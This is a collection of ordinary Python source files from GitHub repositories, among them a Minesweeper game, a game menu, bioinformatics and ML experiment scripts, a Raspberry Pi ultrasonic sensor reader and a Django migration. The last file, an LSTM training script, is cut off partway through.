+{"seq_id":"22748477865","text":"import logging\n\nfrom parser import import_data, export_result\n\n# file_path = \"doc_given/a_example.in\"\n# result_path = \"result/a_example.out\"\n\n# file_path = \"doc_given/b_should_be_easy.in\"\n# result_path = \"result/b_should_be_easy.out\"\n\n# file_path = \"doc_given/c_no_hurry.in\"\n# result_path = \"result/c_no_hurry.out\"\n\n# file_path = \"doc_given/d_metropolis.in\"\n# result_path = \"result/d_metropolis.out\"\n\nfile_paths = [\n\"doc_given/a_example.in\",\n\"doc_given/b_should_be_easy.in\",\n\"doc_given/c_no_hurry.in\",\n\"doc_given/d_metropolis.in\",\n \"doc_given/e_high_bonus.in\"\n]\nresult_paths = [\n\"result/a_example.out\",\n\"result/b_should_be_easy.out\",\n\"result/c_no_hurry.out\",\n\"result/d_metropolis.out\",\n \"result/e_high_bonus.out\"\n]\n\n\ndef main():\n for i in range(0, len(file_paths)):\n file_path = file_paths[i]\n logging.error(file_path)\n result_path = result_paths[i]\n general_info, rides_orig, vehicles = import_data(file_path)\n rides = sorted(rides_orig, key=lambda x: x.weight(), reverse=True)\n for i in range(0,general_info.steps):\n for v in vehicles:\n if v.fulluntil <= i and rides:\n j=0\n # while(True):\n v.rides.append(str(rides[0].i))\n v.fulluntil = i + rides[0].calculate_distance()\n rides.remove(rides[0])\n if len(rides) == 0:\n break\n\n export_result(result_path, vehicles)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"elvgarrui/Hashcode","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72293017370","text":"from typing import Tuple\nfrom deliqc import dna\nfrom deliqc.sample.alignment import _simple_analyzer, _advanced_analyzer\nfrom deliqc.sample.result import FailedReadResult, AlignedReadResult\nfrom deliqc.sample.errors import TooManyMismatchesBetweenPair, TooManyMismatchesToReference, WeirdReads\n\n\nclass WorkerData:\n def __init__(self, **kwargs):\n self.kwargs = kwargs\n self.kwargs[\"coordinates\"] = dna.get_codon_coordinates(kwargs[\"reference\"])\n self.kwargs[\"read_length\"] = len(kwargs[\"reference\"])\n\n\ndef worker(data: Tuple[int, Tuple[str, str], WorkerData]):\n read_number, (r1, r2), metadata = data\n kwargs = metadata.kwargs\n\n simple_failed = False\n advanced_failed = False\n too_many_mismatches_between_pair = False\n too_many_mismatches_to_reference = False\n\n ref_mismatches = 0\n pair_mismatches = 0\n read_indel_target = None\n\n try:\n result = _simple_analyzer(r1, r2, **kwargs)\n except TooManyMismatchesBetweenPair:\n simple_failed = True\n too_many_mismatches_between_pair = True\n except TooManyMismatchesToReference:\n simple_failed = True\n too_many_mismatches_to_reference = True\n\n if simple_failed is True:\n try:\n result = _advanced_analyzer(r1, r2, **kwargs)\n except TooManyMismatchesBetweenPair:\n advanced_failed = True\n too_many_mismatches_between_pair = True\n except TooManyMismatchesToReference:\n advanced_failed = True\n too_many_mismatches_to_reference = True\n except WeirdReads:\n advanced_failed = True\n else:\n too_many_mismatches_between_pair = False\n too_many_mismatches_to_reference = False\n\n if advanced_failed is True:\n if too_many_mismatches_between_pair:\n result = FailedReadResult(FailedReadResult.tooManyMismatchesBetweenPair)\n\n if too_many_mismatches_to_reference:\n result = FailedReadResult(FailedReadResult.tooManyMismatchesToReference)\n\n return result\n","repo_name":"Gillingham-Lab/deliqc","sub_path":"deliqc/sample/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"6529523856","text":"import tensorflow as tf\nimport tensorflow.keras as keras\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout\n\nimport time\nimport numpy as np\n\nclass FC_NN_test_function():\n '''\n Six hump camel function\n\n :param bounds: the box constraints to define the domain in which the function is optimized.\n :param sd: standard deviation, to generate noisy evaluations of the function.\n '''\n\n def __init__(self, max_time=0.18):\n self.batch_size = 128\n self.learning_rate = 0.001\n self.rho = 0.9\n self.epsilon = 1e-07\n self.epochs = 3\n self.samples = 5000\n self.num_classes = 10\n self.max_time = max_time\n\n\n def f(self, X, true_val = False, verbose=0):\n \"\"\"\n Load Mnist data, creates a nueral network, create an\n optimizer, put all three together and train. Finally\n perform test and return test error.\n \"\"\"\n batch_size = self.batch_size\n learning_rate = self.learning_rate\n rho = self.rho\n epsilon = self.epsilon\n epochs = self.epochs\n num_classes = self.num_classes\n\n if len(X.shape) == 1:\n X = np.array(X).reshape(1, -1)\n\n validation_score = np.zeros((X.shape[0], 1))\n\n for index in range(X.shape[0]):\n\n x = X[index]\n x = np.array(x).reshape(-1)\n x = x.reshape(1, -1)\n if true_val:\n reps = 20\n else:\n reps = 1\n out_val = []\n for i in range(reps):\n # Part 1: get the dataset\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n x_train = x_train.reshape(60000, 784)\n x_test = x_test.reshape(10000, 784)\n self.x_test = x_test\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train /= 255\n x_test /= 255\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n\n # Part 2: Make model\n\n model = Sequential()\n model.add(Dense(int(np.power(2, x[:, 2][0])), activation='relu', input_shape=(784,)))\n model.add(Dropout(x[:, 0][0]))\n model.add(Dense(int(np.power(2, x[:, 3][0])), activation='relu'))\n model.add(Dropout(x[:, 1][0]))\n model.add(Dense(num_classes, activation='softmax'))\n if verbose == 1: model.summary()\n\n # Part 3: Make optimizer\n optimizer = tf.keras.optimizers.RMSprop(lr=learning_rate, rho=rho, epsilon=epsilon)\n\n # Part 4: compile\n model.compile(loss='categorical_crossentropy',\n optimizer=optimizer,\n metrics=['accuracy'])\n\n # Part 5: train\n # print(\"batch_size\", batch_size, \"epochs\", epochs)\n history = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=verbose,\n validation_data=(x_test, y_test))\n\n self.model = model\n # Part 6: get test measurements\n score = model.evaluate(x_test, y_test, verbose=1)\n out_val.append(score[1])\n print(\"np.mean(out_val)\",np.mean(out_val))\n print(\"np.std\", np.std(out_val))\n print(\"mse\",np.std(out_val)/len(out_val) )\n validation_score[index, 0] = np.mean(out_val)\n\n return validation_score # test classification error\n\n def c(self, X, true_val=True, verbose=0):\n\n batch_size = self.batch_size\n learning_rate = self.learning_rate\n rho = self.rho\n epsilon = self.epsilon\n epochs = self.epochs\n\n if len(X.shape) == 1:\n X = np.array(X).reshape(1, -1)\n\n X_mean_average = np.zeros((X.shape[0], 1))\n for index in range(X.shape[0]):\n\n x = X[index]\n\n self.f(x, verbose)\n\n samples = self.samples\n average_time = np.zeros(samples)\n for i in range(samples):\n start = time.time()\n self.model.predict_classes(x=self.x_test, batch_size=batch_size)\n stop = time.time()\n average_time[i] = stop - start\n\n # print(\"np.mean(average_time)\", np.mean(average_time))\n # print(\"std\", np.std(average_time))\n # print(\"mse\", np.std(average_time) / np.sqrt(len(average_time)))\n X_mean_average[index, 0] = np.mean(average_time)\n\n return X_mean_average - self.max_time\n\n# objective_function = FC_NN_test_function()\n# # print(\"Verbose execution\")\n# test_error = objective_function.c(X = np.array([[0.2,0.2,5,5],\n# [0.2,0.2,5,5]]), true_val=True, verbose=0)\n#\n# # test_error = objective_function.train_model(X = np.array([[0.2,0.2,9,9],\n# # [0.2,0.2,9,9]]), verbose=1)\n# print(\"Test error:\", test_error)\n\n\n","repo_name":"JuanUngredda/ParEGO_Last_Step","sub_path":"core/acquisition/Real_Experiments/FC_Neural_Network/real_functions_caller.py","file_name":"real_functions_caller.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27208021914","text":"from tkinter.messagebox import askyesno\n\n\ndef confirmation_messagebox(first_name: str, last_name: str) -> askyesno:\n \"\"\"Print confirmation messagebox to delete contact from the Favorites\"\"\"\n\n if last_name:\n full_name = f\"{first_name} {last_name}\"\n else:\n full_name = first_name\n\n answer = askyesno(title='Confirmation',\n message=f'Are you sure that you want to delete \\\"{full_name}\\\" from the Favorites?')\n\n return answer\n","repo_name":"Kalinka5/Contact_book","sub_path":"Frames/Favorites/confirmation_messagebox.py","file_name":"confirmation_messagebox.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35045127095","text":"from PPlay.mouse import *\nfrom PPlay.window import *\nfrom PPlay.gameimage import *\nfrom PPlay.sound import *\n\nimport carregar\nimport telas\nimport cenas\n\n\ndef menu_inicial():\n try:\n with open(\"arquivos_salvamento/jogo_finalizado\", \"r\") as arquivo:\n jogo_fechado = arquivo.read()\n except FileNotFoundError:\n jogo_fechado = 0 \n\n janela = Window(800, 600)\n janela.set_title(\"Not a Hero!\")\n\n janela.update()\n\n mouse = Mouse()\n click = True\n cronometro_click = 0\n\n titulo = GameImage(\"imagens/menu_inicial/titulo.png\")\n titulo.x = 180\n titulo.y = 10\n\n fundo = GameImage(\"imagens/menu_inicial/fundo.png\")\n\n botao_novo_jogo = GameImage(\"imagens/menu_inicial/botao_novo_jogo.png\")\n botao_novo_jogo_plus = GameImage(\"imagens/menu_inicial/botao_novo_jogo_plus.png\")\n botao_continuar = GameImage(\"imagens/menu_inicial/botao_continuar.png\")\n botao_controles = GameImage(\"imagens/menu_inicial/botao_controles.png\")\n botao_creditos = GameImage(\"imagens/menu_inicial/botao_creditos.png\")\n botao_sair = GameImage(\"imagens/menu_inicial/botao_sair.png\")\n\n botao_novo_jogo.x = janela.width / 2 - 80\n botao_novo_jogo.y = 180\n\n botao_novo_jogo_plus.x = botao_novo_jogo.x\n botao_novo_jogo_plus.y = botao_novo_jogo.y + 60\n\n botao_continuar.x = botao_novo_jogo.x\n botao_continuar.y = botao_novo_jogo_plus.y + 60\n\n botao_controles.x = botao_novo_jogo.x\n botao_controles.y = botao_continuar.y + 60\n\n botao_creditos.x = botao_novo_jogo.x\n botao_creditos.y = botao_controles.y + 60\n\n botao_sair.x = botao_novo_jogo.x\n botao_sair.y = botao_creditos.y + 60\n\n musica = Sound(\"musicas/musica_menu.ogg\")\n musica.set_repeat(True)\n musica.set_volume(5)\n\n janela.update()\n\n while True:\n\n # Segurar Clicks em sequência\n if click is False:\n cronometro_click += janela.delta_time()\n\n if cronometro_click >= 0.1:\n click = True\n cronometro_click = 0\n \n # Música\n musica.play()\n\n # Entrada de dados\n if mouse.is_button_pressed(1) and mouse.is_over_object(botao_novo_jogo) and click:\n musica.stop()\n click = False\n cenas.cena_inicial()\n \n if mouse.is_button_pressed(1) and mouse.is_over_object(botao_novo_jogo_plus) and click:\n if int(jogo_fechado) == 0:\n click = False\n telas.tela_jogo_nao_fechado()\n janela.update()\n \n if int(jogo_fechado) == 1:\n musica.stop()\n telas.tela_aviso_ngplus()\n \n if mouse.is_button_pressed(1) and mouse.is_over_object(botao_continuar) and click:\n musica.stop()\n click = False\n carregar.carregar_progresso()\n janela.update()\n \n if mouse.is_button_pressed(1) and mouse.is_over_object(botao_controles) and click:\n click = False\n telas.tela_controles()\n janela.update()\n \n if mouse.is_button_pressed(1) and mouse.is_over_object(botao_creditos) and click:\n click = False\n telas.tela_creditos()\n janela.update()\n \n if mouse.is_button_pressed(1) and mouse.is_over_object(botao_sair) and click:\n click = False\n janela.close()\n break\n \n # Desenhos\n fundo.draw()\n titulo.draw()\n botao_novo_jogo.draw()\n botao_novo_jogo_plus.draw()\n botao_continuar.draw()\n botao_controles.draw()\n botao_creditos.draw()\n botao_sair.draw()\n\n # Update\n janela.update()","repo_name":"mjanibelli/not-a-hero","sub_path":"menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26584509417","text":"#!/usr/bin/env python\nimport argparse\nimport os\nfrom Bio import AlignIO\n\ndef get_length(path):\n totalLength = 0\n n = 0\n align = AlignIO.read(path, \"stockholm\")\n for record in align:\n n += 1\n sequence = str(record.seq).replace(\"-\",\"\")\n totalLength += len(sequence)\n return int(totalLength/n),n\n\ndef main():\n parser = argparse.ArgumentParser(description='Get average lengths of alignments (stockholm format) in input directory ')\n parser.add_argument('--indir', '-i',required=True,help=\"Input dir contains stk files\")\n parser.add_argument('--output','-o',required=True,help=\"Output table of average length\")\n args = parser.parse_args()\n fout = open(args.output,\"w\")\n fout.write(\"rfam-id\\tlength\\tnumber\\n\")\n for stk in os.listdir(args.indir):\n rfamId = stk.split(\".\")[0]\n path = os.path.join(args.indir,stk)\n l, n = get_length(path)\n fout.write(rfamId + \"\\t\" + str(l) + \"\\t\" + str(n) + \"\\n\")\n fout.close()\n \n \n \nif __name__ == \"__main__\":\n main()\n","repo_name":"uaauaguga/bioinfo-utils","sub_path":"scripts/get-stk-length.py","file_name":"get-stk-length.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20180512408","text":"import numpy as np\r\nimport RPi.GPIO as GPIO\r\nimport time\r\nimport serial\r\n\r\n'''\r\n将超声波模块直接连接树莓派的GPIO引脚上\r\n这段程序是用于对超声波模块的测试\r\n'''\r\n\r\n# 设置警告信息为不输出\r\nGPIO.setwarnings(False)\r\n# 使用BCM针脚编号方式\r\nGPIO.setmode(GPIO.BCM)\r\n# 控制引脚GPIO22\r\ntrig = 22\r\n# 接收引脚GPIO17\r\necho = 17\r\n# 设置trig引脚为输出模式,初始化输出为低电平\r\nGPIO.setup(trig, GPIO.OUT, initial=GPIO.LOW)\r\n# 设置echo引脚为输入模式\r\nGPIO.setup(echo, GPIO.IN)\r\nHIGH = 1\r\nLOW = 0\r\n\r\n\r\ndef measure():\r\n\r\n ms = []\r\n i = 0\r\n while i < 10:\r\n # 树莓派向trig引脚发送信号,一个持续10us的方波脉冲\r\n GPIO.output(trig, HIGH)\r\n time.sleep(0.00001)\r\n GPIO.output(trig, LOW)\r\n\r\n # HC - SR04接收到脉冲信号,开始发送超声波并将Echo引脚置为高电平\r\n # echo引脚之前一直接收低电平信号,一旦收到高电平信号就开始记录时间\r\n while GPIO.input(echo) == LOW:\r\n pass\r\n start = time.time()\r\n # 当 HC-SR04 接收到返回的超声波 时,把Echo引脚置为低电平\r\n # 也就是说echo引脚接收到的高电平结束,终止计时\r\n while GPIO.input(echo) == HIGH:\r\n pass\r\n end = time.time()\r\n\r\n # 计算距离,单位厘米,这里的340m/s是超声波在空气中的传播速度\r\n distance = round((end - start) * 340 / 2 * 100, 2)\r\n # print(\"distance:{0}cm\".format(distance))\r\n ms.append(distance)\r\n i = i + 1\r\n\r\n ms.remove(max(ms))\r\n ms.remove(min(ms))\r\n LEN = len(ms)\r\n SUM = sum(ms)\r\n average = SUM/LEN\r\n if average < 32:\r\n flag = '2'\r\n elif 32 < average < 50:\r\n flag = '1'\r\n elif 50 < average:\r\n flag = '0'\r\n else:\r\n flag = '3'\r\n\r\n return flag\r\n\r\nprint(measure())\r\n","repo_name":"HardingPan/crane_vision","sub_path":"ultrasonic_ranging.py","file_name":"ultrasonic_ranging.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"25491382273","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Source: https://leetcode.com/problems/prison-cells-after-n-days/\n# Author: Miao Zhang\n# Date: 2021-03-29\n\nclass Solution:\n def prisonAfterNDays(self, cells: List[int], n: int) -> List[int]:\n\n def nextDay(cells):\n return [int(i > 0 and i < 7 and cells[i - 1] == cells[i + 1])\n for i in range(8)]\n\n seen = {}\n while n > 0:\n c = tuple(cells)\n if c in seen:\n n %= seen[c] - n\n seen[c] = n\n\n if n >= 1:\n n -= 1\n cells = nextDay(cells)\n return cells\n","repo_name":"MichelleZ/leetcode","sub_path":"algorithms/python/prisonCellsAfterNDays/prisonCellsAfterNDays.py","file_name":"prisonCellsAfterNDays.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"12373032373","text":"import random\n\n\ndef get_team_numbers(members):\n \"\"\"\n 최대한 적은 수의 조가 편성되도로 조별 인원 산출 함수\n 7로 나눈 나머지가 5보다 작을 때에 한하여 조별 인원을 1명~2명씩 차감하는 식으로 계산\n \"\"\"\n member_len = len(members)\n if member_len % 7 == 0:\n team_number = [7] * (member_len//7)\n return team_number\n elif member_len % 7 >= 5:\n team_number = [7] * (member_len//7)\n team_number.append(member_len % 7)\n return team_number\n elif member_len % 7 < 5:\n team_number = [7] * (member_len//7)\n team_number.append(member_len % 7)\n index=0\n while team_number[-1] < 5 :\n if team_number[index] == 5 :\n index += 1\n team_number[index] -= 1\n team_number[-1] += 1\n return team_number\n\n\ndef mix_member(members):\n\n team_numbers = get_team_numbers(members)\n output = {}\n for i in range(len(team_numbers)) :\n member_list = []\n for j in range(team_numbers[i]) :\n member_list.append(members.pop(random.randint(0, len(members)-1)))\n output[f'{i+1}조'] = member_list\n return output\n\n\nmembers = [i for i in range(100)]\noutput = mix_member(members)\nprint(output)\n","repo_name":"JunghoGIT/studycode","sub_path":"python/wish_cat/test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16590521888","text":"import sys\nimport time\nimport platform\nimport traceback\nfrom functools import partial\nfrom tkinter import (\n Entry, Event, Label, PhotoImage, Toplevel,\n Button, Frame, Menu, Tk, messagebox\n)\nfrom tkinter.font import Font, nametofont\nfrom os.path import dirname, realpath, join as pjoin\nfrom typing import Callable, Any, Dict\n\nfrom difficulty import Difficulty, EASY, MEDIUM, HARD\nfrom logic import Minesweeper, State\n\nBASE_PATH = dirname(realpath(sys.argv[0]))\n\nLEFT_CLICK = ''\nRIGHT_CLICK = '' if not platform.system() == 'Darwin' else ''\n\nAPPEARANCES: Dict[str, Any] = {\n 'text': {\n 'image': '',\n 'font': None,\n 'compound': 'center',\n 'bg': 'SystemButtonFace', 'fg': 'SystemButtonText',\n 'height': 1, 'width': 2, 'borderwidth': 1, 'padx': 2\n },\n 'image': { 'text': '', 'height': 20, 'width': 20, 'padx': 0 },\n 'default': { 'text': ' ', 'relief': 'raised' },\n 'reveald': { 'state': 'disabled', 'relief': 'sunken' },\n 'flagged': { 'image': None },\n 'bomb': { 'image': None, 'bg': '#E74C3C' }\n}\n\n\nclass CustomDifficultyDialog(Toplevel):\n def __init__(self, change_difficulty: Callable[[Difficulty], None], *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._change_difficulty = change_difficulty\n\n self.title('Custom Difficulty Dialog')\n self.resizable(False, False)\n\n self._entries = {}\n for entry_name in ('rows', 'cols', 'bombs'):\n frame = Frame(self)\n Label(\n frame,\n text=f'{entry_name.title()}:',\n width=10,\n anchor='w',\n justify='left'\n ).pack(side='left')\n entry = Entry(frame)\n entry.pack(side='right', expand=1, fill='x')\n self._entries[entry_name] = entry\n frame.pack(side='top', expand=1, fill='x')\n\n confirm_btn = Button(self, text='Confirm', command=self._onConfirm)\n confirm_btn.pack(side='right')\n\n def _onConfirm(self) -> None:\n try:\n rows = int(self._entries['rows'].get())\n cols = int(self._entries['cols'].get())\n bombs = int(self._entries['bombs'].get())\n except ValueError:\n messagebox.showerror(\n 'Invalid type!',\n 'At least one of the entries contains invalid data type.'\n )\n return\n if rows == 0 or cols == 0 or bombs == 0:\n messagebox.showerror(\n 'Invalid value!',\n 'At least one of the entries conains invalid value.'\n )\n return\n if rows * cols <= bombs:\n messagebox.showerror(\n 'Invalid value!',\n 'Number of bombs is too high for provided grid size.'\n )\n return\n\n self.destroy()\n self._change_difficulty(Difficulty('custom', rows, cols, bombs))\n\n\nclass App:\n def __init__(self) -> None:\n self._difficulty: Difficulty = EASY\n self._minesweeper: Minesweeper\n self._timer: float = 0.0\n\n self._root = Tk()\n self._root.title('Minesweeper')\n self._root.resizable(False, False)\n self._root.report_callback_exception = self._onError\n\n # NOTE: It appears that wile font other than Consolas is in use, the size-changing\n # effect appears after replacing text with image and vice-versa. Allegedly\n # there is no easy way to remove this.\n APPEARANCES['flagged']['image'] = PhotoImage(name='flag', file=pjoin(BASE_PATH, 'img/flag.png'))\n APPEARANCES['bomb']['image'] = PhotoImage(name='bomb', file=pjoin(BASE_PATH, 'img/bomb.png'))\n APPEARANCES['text']['font'] = nametofont('TkFixedFont')\n if platform.system() == 'Windows':\n APPEARANCES['text']['font'] = Font(family='Consolas', size=10)\n\n self._game_frame = Frame(self._root)\n self._game_frame.pack()\n\n self._menu = Menu(self._root)\n self._menu.add_command(label='New Game', command=self._newGame)\n\n self._difficul_menu = Menu(self._menu, tearoff=False)\n for difficulty in (EASY, MEDIUM, HARD):\n self._difficul_menu.add_command(\n label=difficulty.name.title(),\n command=partial(self._setDifficulty, difficulty),\n )\n self._difficul_menu.add_command(\n label='Custom difficulty',\n command=partial(CustomDifficultyDialog, self._setDifficulty),\n )\n\n self._menu.add_cascade(label='Difficulty', menu=self._difficul_menu)\n\n self._root.config(menu=self._menu)\n\n def _setup(self) -> None:\n rows = self._difficulty.rows\n cols = self._difficulty.cols\n for row in range(rows):\n for col in range(cols):\n element = Button(self._game_frame, **APPEARANCES['text'], **APPEARANCES['default'])\n element.bind(LEFT_CLICK, partial(self._reveal, row, col))\n element.bind(RIGHT_CLICK, partial(self._toggleFlag, row, col))\n element.grid(row=row, column=col)\n\n def _onError(self, exctype, excvalue, tb):\n messagebox.showerror(\n 'Error', ''.join(traceback.format_exception(exctype, excvalue, tb))\n )\n self._root.destroy()\n\n def _cleanGameFrame(self) -> None:\n for widget in self._game_frame.winfo_children():\n widget.destroy()\n\n def _newGame(self):\n self._cleanGameFrame()\n self._minesweeper = Minesweeper(self._difficulty)\n self._timer = 0.0\n self._setup()\n\n def _setDifficulty(self, difficulty: Difficulty) -> None:\n self._difficulty = difficulty\n self._newGame()\n\n def _onLose(self) -> None:\n if messagebox.showinfo('Game Over', 'You lost!'):\n self._newGame()\n\n def _onWin(self) -> None:\n time_spent = time.perf_counter() - self._timer\n if messagebox.showinfo('', f'You won!\\nIt took you: {round(time_spent, 2)} seconds.'):\n self._newGame()\n\n def _revealBombs(self):\n for row, col in self._minesweeper.bombs:\n bomb_btn = self._game_frame.grid_slaves(row=row, column=col)[0]\n bomb_btn.configure(**APPEARANCES['image'], **APPEARANCES['bomb'])\n\n def _reveal(self, row: int, col: int, _: Event) -> None:\n if not self._timer:\n self._timer = time.perf_counter()\n\n changed_tiles = self._minesweeper.reveal(row, col)\n for tile in changed_tiles:\n btn = self._game_frame.grid_slaves(row=tile.row, column=tile.col)[0]\n text = str(tile.bombsInNeighbor) if tile.bombsInNeighbor else ' '\n btn.configure(text=text, **APPEARANCES['text'], **APPEARANCES['reveald']) # type: ignore\n\n if self._minesweeper.state == State.LOSE:\n self._revealBombs()\n self._onLose()\n\n def _toggleFlag(self, row: int, col: int, event: Event) -> None:\n btn = event.widget\n try:\n is_flagged = self._minesweeper.toggleFlag(row, col)\n if is_flagged:\n btn.configure(**APPEARANCES['image'], **APPEARANCES['flagged'])\n else:\n btn.configure(**APPEARANCES['text'], **APPEARANCES['default'])\n if self._minesweeper.state == State.WIN:\n self._onWin()\n except ValueError: # Will occure if already revealed tile is getting flagged\n pass\n\n def run(self) -> None:\n self._newGame()\n self._root.mainloop()\n\n\nif __name__ == '__main__':\n App().run()\n","repo_name":"mkm5/minesweeper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30827591589","text":"import csv\nimport os\n\nfrom api.models import Town\n\nfrom django.db import migrations\nfrom django.conf import settings\n\n\ndef upload_csv(apps, schema_editor):\n filename = os.path.join(settings.BASE_DIR, 'data/French Towns Data.csv')\n with open(filename) as f:\n reader = csv.reader(f)\n for i, row in enumerate(reader):\n if i > 1:\n _, created = Town.objects.get_or_create(\n region_code=row[0],\n region_name=row[1],\n dept_code=row[2],\n distr_code=row[3],\n code=row[4],\n name=row[5],\n population=row[6],\n average_age=row[7],\n )\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(upload_csv),\n ]\n","repo_name":"burgerfritz/botify-challenge","sub_path":"api/migrations/0002_auto_20190323_1125.py","file_name":"0002_auto_20190323_1125.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16005963367","text":"'''\nAdd the associated peak_status to each point for a problem instance\nfor easier graphing\n'''\n\nimport sys\n\n\nif len(sys.argv) < 3:\n print(\"Expected Usage:\\n\\n\\tpython add_peaks_to_fitness_counts_eigen_vals.py \")\n sys.exit(1)\n\npeak_file = sys.argv[1]\ndata_file = sys.argv[2]\noutput_data_file = sys.argv[3]\n\npeak_file_read = open(peak_file, \"r\")\ndata_file_read = open(data_file, \"r\")\noutput_data_file_write = open(output_data_file, \"w\")\noutput_data_file_write.write(\"id,count,eigen_cent,fitness,is_peak\\n\")\n\n\npeaks = list()\n\n\nfor line in peak_file_read:\n #Read eigen_vals by node into dict\n peak = line.strip()\n peaks.append(peak)\n\nfor line in data_file_read:\n #split line by comma\n if 'id' in line:\n continue\n components = line.strip().split(',')\n #If peak is in list of peaks set value to True\n is_peak = False\n if components[0] in peaks:\n is_peak = True\n #Output values for each line to output file\n output_data_file_write.write(str(components[0]) + ',' + str(components[1]) + ',' + str(components[2]) + ',' + str(components[3]) + ',' + str(is_peak) + \"\\n\")\n\n","repo_name":"thomasgreen79/Landscape_Ansys","sub_path":"scripts/add_peaks_to_fitness_counts_eigen_vals.py","file_name":"add_peaks_to_fitness_counts_eigen_vals.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32449626710","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 29 21:29:20 2018\n\n@author: raja\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\nX2=np.load('/home/raja/Desktop/ce/oct_29/x_new_features8000x150.npy')\n\nX=X2\ny= pd.read_csv('/home/raja/Desktop/ce/oct_28/test_y.csv', header=None, delimiter=\"\\t\")\ny[0]=y[0].str.replace(\"1\",\"2\")\nkk=y[0].unique().tolist()\nkk.sort(key=len)\ny=y[0].str.replace(\"1\",\"2\")\n\"\"\"\ni=0;\nfor t in kk: \n y=y.replace(t,str(i))\n i=i+1\n\"\"\"\n\ni=0\nfor t in kk:\n if i==1:\n y=y.replace(t,\"1\")\n else:\n y=y.replace(t,'0') \n i=i+1\n \n\ny=y.values\ny=y.astype(np.int)\n\n####FOR 1000 + 1000 split of two classes\n\nnew_x1=[]\nnew_x0=[]\nnew_y1=[]\nnew_y0=[]\n\nfor p in range(0,len(y)):\n if y[p]==1:\n new_x1.append(X[p,:])\n new_y1.append(y[p])\n else:\n new_x0.append(X[p,:])\n new_y0.append(y[p])\n\nX=np.array(new_x1+new_x0)\ny=np.array(new_y1+new_y0)\n\nX=X[0:2000,:]\ny=y[0:2000]\n\n\nnp.savetxt('X_new_features_2000x150.csv', X, delimiter=',',fmt=\"%d\")\nnp.savetxt('y_new_features_2000.csv', y, delimiter=',',fmt=\"%d\")\n\nnp.save('x_matrix_2000x150.npy',X)\nnp.save('y_matrix_2000.npy',y)\n\n\n","repo_name":"RajaAyyanar/NLP_CauseEffectRelation","sub_path":"dot1.py","file_name":"dot1.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39363849378","text":"import pandas as pd\nimport torch\nimport numpy as np\nimport pdb\nfrom pathlib import Path\nimport os\nfrom os.path import abspath\nfrom death.post.inputgen_planF import InputGenF\nfrom torch.utils.data import DataLoader\nimport torch.nn as nn\nfrom torch.nn.modules import LSTM\nfrom torch.autograd import Variable\nimport pickle\nfrom shutil import copy\nimport traceback\nfrom collections import deque\nimport datetime\nfrom death.DNC.tsDNCtrainer import logprint\nfrom death.taco.collate import pad_collate\n\nbatch_size = 1\n\n\ndef sv(var):\n return var.data.cpu().numpy()\n\nclass dummy_context_mgr():\n def __enter__(self):\n return None\n\n def __exit__(self, exc_type, exc_value, traceback):\n return False\n\ndef save_model(net, optim, epoch, iteration, savestr):\n epoch = int(epoch)\n task_dir = os.path.dirname(abspath(__file__))\n if not os.path.isdir(Path(task_dir) / \"saves\" / savestr):\n os.mkdir(Path(task_dir) / \"saves\" / savestr)\n pickle_file = Path(task_dir).joinpath(\"saves/\" + savestr + \"/lstmnorm_\" + str(epoch) + \"_\" + str(iteration) + \".pkl\")\n with pickle_file.open('wb') as fhand:\n torch.save((net, optim, epoch, iteration), fhand)\n print('model saved at', pickle_file)\n\ndef load_model(computer, optim, starting_epoch, starting_iteration, savestr):\n task_dir = os.path.dirname(abspath(__file__))\n save_dir = Path(task_dir) / \"saves\" / savestr\n highestepoch = 0\n highestiter = 0\n for child in save_dir.iterdir():\n try:\n epoch = str(child).split(\"_\")[3]\n iteration = str(child).split(\"_\")[4].split('.')[0]\n except IndexError:\n print(str(child))\n iteration = int(iteration)\n epoch = int(epoch)\n # some files are open but not written to 